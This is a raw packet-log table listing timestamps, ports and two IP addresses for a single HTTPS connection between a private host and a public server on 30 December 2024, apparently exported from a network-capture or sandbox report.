Dec 30, 2024 19:15:14.439199924 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.439997911 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.440027952 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.440047979 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.440052986 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.440071106 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.440088987 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.448183060 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.448216915 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.448266029 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.448276043 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.448312044 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.465362072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.465384960 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.465473890 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.465483904 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.465606928 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.467992067 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.468008995 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.468063116 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.468069077 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.469594002 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.472959042 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.472974062 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.473026037 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.473032951 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.473593950 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.477054119 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.494482994 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.494508982 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.494568110 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.494580984 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.494744062 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.526746035 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.526777983 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.526813030 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.526819944 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.526859999 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.527726889 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.527740955 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.527806044 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.527812004 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.527823925 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.527846098 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.528542995 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.528559923 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.528620005 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.528626919 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.529167891 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.537130117 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.537146091 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.537209034 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.537220955 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.537610054 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.572849035 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.572864056 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.572926998 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.572951078 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.573164940 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.573183060 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.573208094 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.573215008 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.573223114 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.573251009 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.573957920 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.573982000 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.574006081 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.574012041 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.574039936 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.574104071 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.583830118 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.583848953 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.583913088 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.583920956 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.584671974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.615430117 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.615444899 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.615511894 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.615528107 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.616134882 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.616555929 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.616568089 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.616614103 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.616619110 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.616745949 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.617371082 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.617383957 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.617419004 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.617423058 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.617444038 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.617456913 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.625649929 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.625669003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.625720978 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.625735998 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.625766993 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.661256075 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.661277056 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.661360979 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.661377907 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.661607981 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.661875010 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.661901951 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.661923885 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.661927938 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.661952972 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.661967039 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.662434101 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.662451029 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.662481070 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.662486076 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.662509918 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.662528038 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.672060966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.672121048 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.672161102 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.672173023 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.672202110 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.672219992 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.703769922 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.703792095 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.703836918 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.703855038 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.703880072 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.703902006 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.704474926 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.704489946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.704535961 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.704541922 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.704593897 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.705142975 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.705157042 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.705213070 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.705224037 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.705296993 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.713896990 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.713911057 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.713959932 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.713968039 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.714020967 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.750046015 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.750061989 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.750101089 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.750113964 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.750138998 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.750154018 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.750516891 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.750533104 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.750588894 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.750593901 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.750663996 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.751127005 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.751141071 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.751183033 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.751188040 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.751267910 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.760848999 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.760864973 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.760932922 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.760941029 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.761141062 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.818403959 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.818423986 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.818509102 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.818536997 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.818707943 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.819152117 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.819166899 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.819227934 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.819233894 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.819732904 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.819844007 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.819856882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.819916964 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.819921970 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.819983959 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.826565027 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.826589108 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.826636076 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.826642036 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.826669931 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.826704025 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.838742971 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.838757038 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.838821888 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.838826895 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.838881969 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.839428902 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.839442968 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.839476109 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.839483023 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.839519024 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.839531898 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.839888096 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.839911938 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.839947939 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.839952946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.839977980 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.839997053 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.849292994 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.849311113 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.849365950 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.849373102 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.849426031 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.907105923 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.907133102 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.907216072 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.907237053 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.907249928 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.907283068 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.907742977 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.907766104 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.907810926 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.907816887 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.908014059 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.908482075 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.908504963 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.908581972 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.908587933 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.908617973 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.915097952 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.915122032 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.915144920 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.915153980 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.915183067 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.915199995 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.927222013 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.927244902 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.927292109 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.927308083 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.927623034 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.927815914 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.927830935 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.927869081 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.927874088 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.927901983 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.927918911 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.928672075 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.928688049 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.928735971 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.928740978 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.928981066 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.937871933 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.937887907 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.937926054 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.937939882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.937966108 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.937985897 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.002830029 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.002851009 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.002922058 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.002938986 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.002979994 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.003536940 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.003555059 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.003611088 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.003617048 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.003730059 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.004394054 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.004410028 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.004466057 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.004471064 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.004940987 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.006814003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.006829977 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.006886959 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.006892920 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.006930113 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.015687943 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.015702963 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.015760899 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.015769958 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.015805960 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.016042948 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.016057014 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.016094923 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.016099930 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.016129971 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.016149998 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.016530991 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.016546965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.016588926 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.016592979 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.016619921 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.016633034 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.026376963 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.026395082 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.026458025 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.026468039 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.026494026 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.097317934 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.097349882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.097404003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.097441912 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.097459078 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.097486973 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.097691059 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.097713947 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.097750902 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.097757101 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.097798109 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.103768110 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.103782892 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.103872061 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.103879929 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.105566025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.105595112 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.105628967 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.105637074 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.105668068 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.136533976 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.136548996 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.136611938 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.136641979 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.136653900 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.136827946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.136845112 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.136883974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.136889935 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.136907101 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.164602041 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.164616108 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.164680958 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.164689064 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.164738894 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.180591106 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.180619001 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.180659056 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.180676937 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.180715084 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.251125097 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.251151085 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.251219034 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.251234055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.251264095 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.251526117 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.251542091 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.251585007 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.251594067 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.251626968 CET	49709	443	192.168.2.5	172.67.154.95
